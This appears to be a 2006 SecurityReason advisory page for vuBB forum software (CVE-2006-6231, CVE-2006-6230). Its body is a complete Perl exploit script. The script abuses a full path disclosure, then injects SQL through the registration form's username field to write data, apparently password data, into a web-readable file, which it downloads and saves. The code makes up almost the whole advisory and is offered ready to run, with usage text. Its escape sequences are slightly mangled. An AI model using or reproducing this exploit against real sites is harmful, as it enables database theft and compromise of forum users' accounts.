|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1948 CVE : CVE-2006-6231 CVE : CVE-2006-6230 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : DarkFig Published : 05.12.2006
Advisory Text : #!/usr/bin/perl # # by DarkFig -- acid-root.new.fr # French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt # use IO::Socket; use LWP::Simple; # Header print "rn+---------------------------------------+", "rn"; print "| vuBB <= 0.2.1 [BFA] SQL Injection -|", "rn"; print "+---------------------------------------+", "rn"; # Usage if(!$ARGV[2]){ print "| Usage: <host> <path> <username> ------|", "rn"; print "+---------------------------------------+", "rn"; exit; } # Host if($ARGV[0] =~ /http://(.*)/){ $host = $1; } else { $host = $ARGV[0]; } print "[+]Host: $hostrn"; # Var my $path = $ARGV[1]; my $user = $ARGV[2]; print "[+]User: $userrn"; my $port = 80; my $fpd = "http://".$host.$path."includes/vubb.php"; my $err1 = "[-]Can't connect to the hostrn"; my $err2 = "[-]Can't retrieve the full pathrn"; my $err3 = "[-]Can't retrieve the resultsrn"; my $poti = "POST "."$path"."index.php?act=register&action=register"." HTTP/1.1"; # Full Path Disclosure $req0 = get($fpd) or die print $err1 and end(); if($req0 =~ /in <b>(.*)/includes/vubb.php</b>/) { $fullpath = $1."/thisismypasswd.txt"; print "[+]Path: $1rn"; } else { print $err2 and end(); } # Malicious data my $pdat = "user=$user"."%27+INTO+OUTFILE+%27"."$fullpath"."%27%23"."&email=a669c45 70f%40hotmail.com&vemail=a669c4570f%40hotmail.com&pass=mypassword&vpass= mypassword&agreement=iacceptohackit&agree=on"; my $ldat = length $pdat; my $req1 = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => "tcp" ) or print $err1 and end(); print $req1 "$poti", "rn"; print $req1 "Host: $host", "rn"; print $req1 "Content-Type: application/x-www-form-urlencoded", "rn"; print $req1 "Content-Length: $ldat", "rnn"; print $req1 "$pdat", "rn"; close($req1); # Results $req2 = get("http://".$host.$path."/thisismypasswd.txt") or print $err3 and end(); open(f, ">VUBB_RESULT.txt"); print f $req2; close(f); print "[+]Done: VUBB_RESULT.txtrn"; end(); # Bye sub end { print "+---------------------------------------+", "rn"; exit; }  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Multiple Vendors libc/gdtoa printf(3) Array Overrun
SecurityReason realised new advisory about vulnerabilities libc/gdtoa... |
||
| Apache |  |
|
» Apache Tomcat |
||
» Apache Tomcat User |
||
| PHP | |
|
» PHP |
||
- 2009-05-30| Copyright © SecurityReason.com. All Rights Reserved. |